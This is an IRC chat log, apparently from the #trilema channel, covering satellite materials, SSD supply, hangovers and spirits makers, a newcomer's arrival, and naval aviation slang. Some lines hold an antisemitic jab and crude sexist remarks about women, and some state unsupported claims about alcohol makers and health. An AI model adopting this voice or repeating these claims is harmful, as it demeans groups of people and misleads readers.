1744750;1512059594;asciilifeform;ahalol 1744751;1512059817;mircea_popescu;asciilifeform anyway, evidently gas diffusion was a problem. but this was re hypothetical item which is still ant-sized in body, but has really lengthy legs, rather than proportionate scaling 1744752;1512059835;asciilifeform;aa 1744753;1512059838;mircea_popescu;"chitin is great, better than steel for sub-cm foils". 1744754;1512059863;mircea_popescu;once you go over a cm... not so much. 1744755;1512059905;mircea_popescu;the exact same is true of... well... steel. wtf are you going to make the 850`000 ton megasat out of ? "um... poured concrete ?" "what the fuck!?" "hey it worked for bridge engineering" 1744756;1512059952;mircea_popescu;i expect the large sats to be actually weaved, but the materials aren't there yet (and no word on weaved nuclear reactor yet, either) 1744757;1512060027;mircea_popescu;(the iss is about half that, for the curious, and dun do much.) 1744758;1512060048;mircea_popescu;other than that, the salyuts were 20k or so. 1744759;1512060136;asciilifeform;it's a concept in roughly same weight class of technical feasibility as martian dome. 1744760;1512060151;mircea_popescu;nah, many grades under. 1744761;1512060164;mircea_popescu;bridge too far, certainly, but not nearly as far. 1744762;1512060185;mircea_popescu;roughly same weight class as deep sea dome / oil sucker. 1744763;1512060231;asciilifeform;other problem is that - orders of magnitude cheaper to shoot, than to build. 1744764;1512060253;asciilifeform;sorta how terrestrial castles went out of fashion. 1744765;1512060269;mircea_popescu;anyway, the major problem immediately becomes http://btcbase.org/log/2016-10-17#1556179 1744766;1512060269;a111;Logged on 2016-10-17 05:22 mircea_popescu: ben_vulpes the "interdictor" is this item which has a railgun, a supply of pellets, and a huge array of solar panels etc to power them. this item can then shoot fast pellets towards any other ship, crippling it. 1744767;1512060274;mircea_popescu;asciilifeform quite exactly. 1744768;1512060387;mircea_popescu;anyway, back to the "weaved" sf : kinda the whole point of "3d printing", as i saw it at the time. useless wankery but who's gonna make the weaved nuclear reactor. 1744769;1512060491;mircea_popescu;asciilifeform here's something you'll appreciate (and perhaps also phf) : https://upload.wikimedia.org/wikipedia/commons/thumb/d/da/2017_East_Africa_Security_Synchronization_Conference_170124-Z-HS473-0041.jpg/800px-2017_East_Africa_Security_Synchronization_Conference_170124-Z-HS473-0041.jpg 1744770;1512060509;mircea_popescu;i dun recall the soviets ever managing such a crisp icon of "the meeting with the politruk". 1744771;1512060530;mircea_popescu;waldhauser's face is worth a million unified standard dosidoes. 1744772;1512060566;asciilifeform;lol!! these look almost familiar 1744773;1512060586;mircea_popescu;marine guy. 1744774;1512060593;asciilifeform;when asciilifeform worked in a u.s. army research nonsense, the brass looked quite like this. 1744775;1512060606;asciilifeform;50-60y.o.-with-2.5-dogs-3-kids-etc 1744776;1512060619;mircea_popescu;well sure, it's the white man's vhs. 1744777;1512060747;mircea_popescu;(for the complete noob : actual competent, technically minded staff depicted on the left meets ambitious, cerebrally vacuous imperial legate, depicted on the right.) 1744778;1512060777;mircea_popescu;a mute game of https://www.youtube.com/watch?v=kMGu-55sKJs ensues 1744779;1512061091;asciilifeform;in other lulz, N-1 SSDs are here, still waiting for Nth -- because guess what, they're RATIONED for the whateverth-year in a row 1744780;1512061098;asciilifeform;'can't have plebe building massive ssd farm' 1744781;1512061106;asciilifeform;'3 per customer' etc 1744782;1512061122;asciilifeform;from EVERY vendor, by not-particularly-well-concealed organized cartel by samsung et al 1744783;1512061144;asciilifeform;'all dealers : N limit per-customers -- or you'll pay retail' 1744784;1512061185;mircea_popescu;heh 1744785;1512061216;mircea_popescu;this isn't true, incidentally, i bought sixty a few weeks ago. 1744786;1512061262;asciilifeform;depends strongly on which. 1744787;1512061309;asciilifeform;( e.g. if you want the server-grade non-'3d nand' , then quite difficult to get more than handful at a time , unless you're buying by the pallet ) 1744788;1512061407;mircea_popescu;ah. maybe then 1744789;1512061412;mircea_popescu;i didn't look that deeply into it. 1744790;1512061471;asciilifeform;substantial diff in mtbf. 1744791;1512061498;asciilifeform;( the konsoomer crapola is subj to spontaneous failures of whole orchestra ) 1744792;1512061538;mircea_popescu;they all are fwis. 1744793;1512062072;asciilifeform;detectably variably. as a rule, denser -> moar shit. 1744794;1512062084;asciilifeform;survives fewer writes. 1744795;1512062108;mircea_popescu;so you throw them out sooner. same shit. 1744796;1512062108;asciilifeform;( and, in the ultra-dense arrays, more interestingly : reads (!) ) 1744797;1512062142;asciilifeform;hence why i use the cheaper ones at home. but on other hand in orbit... 1744798;1512062159;asciilifeform;( or in cement... ) 1744799;1512062184;*;asciilifeform brb,meat 1744800;1512063413;lobbes;http://btcbase.org/log/2017-11-30#1744657 << didja know wikitardia links to your blog too ("under further reading")? >> https://en.m.wikipedia.org/wiki/Erik_Naggum 1744801;1512063413;a111;Logged on 2017-11-30 15:26 asciilifeform: every so often somebody linkes from hn, reddit, etc ( and here i was thinking 'aaah, finally permabanned' ! ) 1744802;1512063836;mircea_popescu;lel is alf teh usg-annointed new naggum ? 1744803;1512065118;asciilifeform;lolwut 1744804;1512065132;asciilifeform;aah that was old snoar, links to my piece re subj 1744805;1512065163;asciilifeform;possibly i even spammed it in meself many years ago. ( for some reason was not yet kicked from pediwikia then; naggum after all was not mircea_popescu... ) 1744806;1512065342;mircea_popescu;asciilifeform << “He’s dead, Jim” << how do you even produce the windows quotes ? 1744807;1512065369;asciilifeform;y'mean wordpressquotes 1744808;1512065386;asciilifeform;( prolly oughta did in the phpolade, untouched since '07 or so, and see wtf gives ) 1744809;1512065441;asciilifeform;gotta wonder who was thinking , with what organ, 'hey y'know what users will luvvv? if we replace their input with random liquishit' 1744810;1512066267;asciilifeform;http://www.loper-os.org/?p=1927&cpage=1#comment-18326 << typical lolcat linked ftr. 1744811;1512066527;mircea_popescu;o yeah right you are, prolly wp ineptitude. 1744812;1512066534;mircea_popescu;mp wp is fixed in this way :D 1744813;1512066549;asciilifeform;incidentally none of the 4 versions of winblowz i have at the ready, produce 'windows quotes'... 1744814;1512066555;asciilifeform;they're traditionally associated with crapple. 1744815;1512066560;mircea_popescu;ah 1744816;1512066574;asciilifeform;ipnoje etc. will (by default, there's a toggle) emit'em. 1744817;1512066612;asciilifeform;at some point i'ma plunder mpwp for useful patches again ( i lost steam when discovered that the spam filtrator cannot be made to work on my hoster ) 1744818;1512066702;asciilifeform;so far the only item i was able to crib was the gpg formatter. 1744819;1512066847;asciilifeform;in other curios, http://trilema.com/2017/color-revolutions-green-or-today-in-usg-corruption-careerism-cronyism-and-malfeasance-in-the-special-warfare-center/#comment-123715 1744820;1512067916;mircea_popescu;asciilifeform apparently dood had a treasure trove of such lulz. 1744821;1512068241;asciilifeform;'By their accounts, Cmdr. Tom Sobiek, the commanding officer, convened instructors who had expressed concerns about the women's flying. Sobiek allegedly said that "the women are going to graduate regardless of how they performed." One officer summarized Sobiek as saying, "you guys don't understand, this is bigger than all of us, these women are going to graduate no matter what."' << prettygreat. 1744822;1512068254;mircea_popescu;empire only knows one move. 1744823;1512068315;asciilifeform;find new and new crops of fresh 'we owe everything we have to the great inca' nobodies ? 1744824;1512068348;mircea_popescu;basically, inflaiton. "this is the new currency, worth 1/10 what it was buy you deem it as acceptable substitute" 1744825;1512068425;asciilifeform;that's the other side of the medal aha. i was speaking of what this move pays for -- the added biomass. 1744826;1512068441;mircea_popescu;!~google gulf of sidra incident 1744827;1512068443;jhvh1;mircea_popescu: 1989 air battle near Tobruk - Wikipedia: ; Gulf of Sidra incident (1981) - Wikipedia: ; Gulf of Sidra incident - Wikipedia: 1744828;1512068489;mircea_popescu;back when usg could actually repel three dozen enemy aircraft, even libya had them. 1744829;1512070300;asciilifeform;http://btcbase.org/log/2017-11-30#1744625 << this is an interesting item, and worth picking up briefly again -- there's 2 aspects : a) kinetics b) active-after-all 'inactive' ingredients 1744830;1512070300;a111;Logged on 2017-11-30 03:03 mircea_popescu: http://btcbase.org/log/2017-11-29#1744530 << note that the alcohol discussion is re taste. they all get you drunk. (arguably not the same drunk, i guess, but anyway) 1744831;1512070322;mircea_popescu;yes. 1744832;1512070327;asciilifeform;ask the marijuanists, for instance, re 'strains', or effect of eating vs smoke etc. 1744833;1512070359;mircea_popescu;very simple rule is, drink straight alcohol (i do mean, pharmaceutically pure, 99.999%) to get an idea how your drunkedness goes. 1744834;1512070389;mircea_popescu;then you can proceed to compare the unbeatable ro plumb distillate / fine old french wines etc with the tequilla/bisulphited california wine/random swill. 1744835;1512070394;asciilifeform;at one time was rite of passage for medical men 1744836;1512070432;mircea_popescu;proper alcohol (which includes no grains as well as nothing ever made by any english speaker anywhere) gives you a very pleasant, mellow morning after. a fine reason to drink is not even the drunkedness but THE "HANGOVER". 1744837;1512070456;mircea_popescu;the improper wood-and-rags ooze will give you headaches, blurred vision, sickness, etcetera etcetera. 1744838;1512070462;asciilifeform;i find it interesting that 'cause of hangover' is still in dispute 1744839;1512070471;mircea_popescu;by whom 1744840;1512070473;asciilifeform;after what, n thou. yrs. 1744841;1512070517;asciilifeform;i wasn't aware that the matter was ever settled . 1744842;1512070533;mircea_popescu;well, according to some idiots somewhere there exists such a thing as african literature 1744843;1512070537;mircea_popescu;what matter is ever settled. 1744844;1512070537;asciilifeform;( 'distillation byproduct theory', 'dehydration theory', 'vitaminosis theory' etc ) 1744845;1512070563;mircea_popescu;hey, alcohol intake will deplete water and various metabolytes in the liver, that's how that goes. 1744846;1512070579;asciilifeform;right. prolly a constellation of all 3 1744847;1512070779;mircea_popescu;you can be as hydrated and vitaminized as you wish, anything diageo sells is going to give you a hangover. 1744848;1512071007;asciilifeform;what's diageo 1744849;1512071024;ben_vulpes;grainbooze makes for nasty distillation byproducts? or what is the difference between fruit and grain spirits that makes for this difference in hangover quality 1744850;1512071150;mircea_popescu;asciilifeform the continuator of gangster era alcohol production methids. sells of all the 40% abv crap distinctly labelled but singuarily produced. 1744851;1512071170;mircea_popescu;same vat powers the "beefeather" gin as the "Smirnoff" vodka as the "walker" whisky as the everything else. 1744852;1512071203;asciilifeform;would be surprising if ~all of usa rotgut wasn't made together at some equiv of 'unilever' yea 1744853;1512071209;mircea_popescu;ben_vulpes i have no deeper understanding than european alimentary tradition. fruit alcohol only item fit for human consumption. 1744854;1512071220;mircea_popescu;asciilifeform its name being... diageo. 1744855;1512071243;asciilifeform;usa managed to ruin fruit alcohols also, however. 1744856;1512071250;asciilifeform;( bisulphate etc ) 1744857;1512071291;mircea_popescu;there's a coupla "competitive" alt-flavoured soda producers (they call the swill beer for some reason), as a direct result of distilled spirits available in the anglo world beiong so fucking toxic 1744858;1512071327;mircea_popescu;"heineken" flavoured sprite is just as toxic, of course, but because the angloworld swallows so much soda anyway, the effects are not specifically detectable. 1744859;1512071340;asciilifeform;( in other lulz, 'New top story on Hacker News: The Peculiarly Quiet Decline and Fall of the KVM ' -- twatter ) 1744860;1512071409;ben_vulpes;fuckin a inbev owns pilsner urquell too 1744861;1512071438;mircea_popescu;it's not practical to run independents in nato reich. they're all government agencies. 1744862;1512079423;mircea_popescu;!!up mquander 1744863;1512079423;deedbot;mquander voiced for 30 minutes. 1744864;1512079513;mquander;oh hi. i don't know much about this channel/project/republic, i joined because it got a shoutout in my RSS (http://www.loper-os.org/?p=1762) so i came to see what's up 1744865;1512079525;mircea_popescu;cool. 1744866;1512079527;mircea_popescu;got a rsa key ? 1744867;1512079600;mquander;i haven't used deedbot, so no, not yet, i will go do it once i clearly understand the mechanism 1744868;1512079647;mircea_popescu;rsa key is a basic tool of computer literacy anyway. like ability to write down own name basic standard of traditional literacy. 1744869;1512079649;ben_vulpes;mquander: https://quander.me/ this you ? 1744870;1512079689;mquander;mircea_popescu: i understand asymmetric encryption and RSA 1744871;1512079690;mircea_popescu;that loads something ? 1744872;1512079698;mquander;ben_vulpes: yes 1744873;1512079716;ben_vulpes;mircea_popescu: aye, on a heathen dnsulated thing 1744874;1512079729;mircea_popescu;archive.is dun see it. 1744875;1512079739;ben_vulpes;http://p.bvulpes.com/pastes/edeGY/?raw=true 1744876;1512079743;mircea_popescu;ty 1744877;1512079750;ben_vulpes;> mongodb 1744878;1512079752;ben_vulpes;REEEEEEEEEE 1744879;1512079776;ben_vulpes;jus' playin, mquander. 1744880;1512079780;mquander;ben_vulpes: i quit that job :) 1744881;1512079794;mircea_popescu;mquander you know eulora's been looking for coders liek forever. 1744882;1512079894;mircea_popescu;not to mention various pieces of trilema refiction awaiting their literary criticists. 1744883;1512079939;mquander;as you might surmise, i did not know that because until just now i didn't know about eulora, but i like MUDs and MMOs so i will be interested to look at it 1744884;1512079961;mquander;anyway afk for now getting work done 1744885;1512079971;mircea_popescu;aaand in other ancient lulz, https://bitcointalk.org/index.php?topic=1960821.0 1744886;1512080565;ben_vulpes;and glories of late-nineties web design: http://www.roget.org/hierarchy.htm 1744887;1512081974;asciilifeform;lol did i just narrowly miss the next laddel ?? 1744888;1512082001;asciilifeform;2 dan AGA Go << iftrue, notbad.jpg 1744889;1512082064;asciilifeform;though 'I'm also active in the San Francisco Bay Area Less Wrong community'... 1744890;1512082106;asciilifeform;http://btcbase.org/log/2017-11-30#1744885 << hey mircea_popescu , didja know!, that the proof ain't proofyenuff, 'has he signed addresses that prove he is that wealthy? how do we know for a fact?', i had nfi ! 1744891;1512082106;a111;Logged on 2017-11-30 22:12 mircea_popescu: aaand in other ancient lulz, https://bitcointalk.org/index.php?topic=1960821.0 1744892;1512082139;mircea_popescu;there's no shortage of lulz. 1744893;1512082140;asciilifeform;'he and his group has enough bitcoins (up to billion+)' << trololol this has gotta be a shot for comedy prize 1744894;1512082153;mircea_popescu;billcoins. 1744895;1512082164;asciilifeform;billclitcoin 1744896;1512082404;mircea_popescu;in other when-did-america-die 1990s memorabilia : https://www.pbs.org/wgbh/pages/frontline/shows/navy/tailhook/favors.html 1744897;1512082488;mircea_popescu;inviting local college to slut out as tailhookers and well... http://femmesetleurstresors.f.e.pic.centerblog.net/d7acb081.jpg 1744898;1512082541;asciilifeform;lol! 1744899;1512082607;mircea_popescu;https://www.tailhook.net/AVSLANG.htm << better list than the hacker lexicon, in purely lexical terms, and an evident source of the pencildick's envious, unreferenced cultural appropriation. 1744900;1512082650;mircea_popescu;i can understand why the people that invented swinging'd be a little bit cooler than the people that invented tech support. 1744901;1512082662;asciilifeform;the pre-esr 'jargonfile' was not halfbad 1744902;1512082671;asciilifeform;toobad it's unavailable afaik anywhere on the net now. 1744903;1512082690;asciilifeform;( d00d is the singlehanded author of just about all of the dubious/objectionable crapola therein ) 1744904;1512082693;mircea_popescu;not too bad but not too large and nowhere near "kick the tires, light the fires..." 1744905;1512082732;asciilifeform;notably missing is the piss-on-the-tyres 1744906;1512082735;asciilifeform;or was that only in su 1744907;1512082741;mircea_popescu;i expect. 1744908;1512082767;asciilifeform;'Knife Fight in a Phone Booth' << prettygreat 1744909;1512082773;asciilifeform;ww2-era flyers had even more colour to'em 1744910;1512082781;asciilifeform;sadly whole profession ended up pencilated. 1744911;1512082788;mircea_popescu;most of this is attempted-preservation of the perceived grandeur. 1744912;1512082793;asciilifeform;aha 1744913;1512082802;asciilifeform;it's dead as the dodo today tho. 1744914;1512082808;mircea_popescu;well sure. 1744915;1512082837;mircea_popescu;even in the 90 ie 91, i don't expect a majority of nubile collegiate sluts perceived AS AN OBLIGATION the invitation to whore out for the airmen. 1744916;1512083046;asciilifeform;profession had a happy childhood and youth and that's more than many other professions get. 1744917;1512083075;mircea_popescu;true. 1744918;1512083095;asciilifeform;today jet man is more or less a programmer with uncommonly unpleasant working condition. 1744919;1512083169;asciilifeform;( tru, he doesn't have to program in 'rails'. but then again wwwist dun have to piss into a tube. ) 1744920;1512083445;asciilifeform;'Tits Machine. A good, righteous airplane. Current airplanes need not apply, this is a nostalgic term referring to birds gone by. By all accounts the F-8 Crusader was a tits machine.' 1744921;1512083516;mircea_popescu;i can see the point re "birds gone by". by the time your fighter jet comes with "and don't turn left lest its jew nose cuts off engine compressor" its like... WHO DID THIS IN RAILS! 1744922;1512083610;asciilifeform;not as if the 'gone by' didn't come with a lengthy list of 'don't do', and various arcana ( e.g. required manual fiddling with fuel mixture, radiator cowling, etc ) 1744923;1512083629;mircea_popescu;matter of expectations. 1744924;1512083645;mircea_popescu;at the time enemy is happy his propeller isn't cast in concrete, you can put up with tasting the fuel. 1744925;1512083699;asciilifeform;'Admiral’s Doorbell. The yellow button in an F/A-18 cockpit that jettisons all the external stores in an emergency. If you hit it, you’ll be “ringing the admiral's doorbell” to explain why.' 1744926;1512083759;asciilifeform;btw folx who enjoy the subj like, will also enjoy http://btcbase.org/log/2016-12-08#1579985 ( i have nfi if translated into anything ) 1744927;1512083759;a111;Logged on 2016-12-08 18:28 asciilifeform: gymnasts may not be perfect example. when you have a role where the training per se is costly, you're stuck picking. e.g., pilots; i recently read a quite interesting autobio, 'Обречены на подвиг' ('condemned to heroism', roughly) by su flying d00d / instructor / colonel. described how children having any physical imperfection, even tooth cavity, were mercilessly rejected from flight academy even if they passed all of 1744928;1512083831;asciilifeform;*link 1744929;1512084024;mircea_popescu;i dunno about cavities ; but training commander mp would sack pilots who fail to synchronize bowel movements to "half hour before flight duty" within the first month. 1744930;1512084037;mircea_popescu;"genetic inadequacy for job" 1744931;1512084071;asciilifeform;item referred to pre-pre-pre-pre...flight selections 1744932;1512084078;asciilifeform;i.e. in end of grade school. 1744933;1512084086;mircea_popescu;myea 1744934;1512084100;asciilifeform;in a very poor country , where machines order of magnitude scarcer, dearer, than meat. 1744935;1512084259;asciilifeform;nao re cavities, i do not specifically know the su air corps logic. possibly bad teeth in a boy were considered a mark of innate intractability to discipline; possibly some more basic, orcish 'choosing two potatoes, pick the symmetric and unblemished' formula. 1744936;1512084309;asciilifeform;iirc there was a trilema re whores , where was a line 'when vastly more items than slots, gotta pick ~somehow~' 1744937;1512084340;mircea_popescu;im sure